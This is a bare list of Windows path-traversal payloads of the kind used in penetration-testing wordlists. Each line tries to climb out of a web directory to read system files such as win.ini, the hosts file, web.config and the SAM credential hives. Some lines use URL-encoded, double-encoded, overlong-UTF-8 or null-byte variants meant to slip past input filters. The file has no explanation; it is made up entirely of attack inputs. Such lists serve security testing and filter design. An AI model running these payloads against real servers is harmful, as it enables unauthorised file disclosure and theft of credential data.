# Windows Path Traversal Payloads
..\..\..\windows\win.ini
..\..\..\..\windows\win.ini
..\..\..\..\..\windows\win.ini
..\..\..\..\..\..\windows\win.ini
..\..\..\windows\system32\drivers\etc\hosts
..\..\..\windows\system.ini
..\..\..\windows\system32\config\sam
..\..\..\boot.ini
..\..\..\inetpub\wwwroot\web.config
..\..\..\inetpub\logs\logfiles
..\..\..\windows\debug\netsetup.log
..\..\..\windows\repair\sam
..%5c..%5c..%5cwindows%5cwin.ini
..%255c..%255c..%255cwindows%255cwin.ini
..%c0%5c..%c0%5c..%c0%5cwindows%5cwin.ini
..%c1%9c..%c1%9c..%c1%9cwindows%c1%9cwin.ini
..%5c..%5c..%5c..%5cwindows%5cwin.ini
....\\....\\....\\windows\\win.ini
..../..../..../windows/win.ini
..%00\..%00\..%00\windows\win.ini
../../../windows/win.ini
../../../../windows/win.ini
../../../../../windows/win.ini
..%2f..%2f..%2fwindows%2fwin.ini
%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini
/..\\../..\\../windows/win.ini
\../..\../..\windows\win.ini
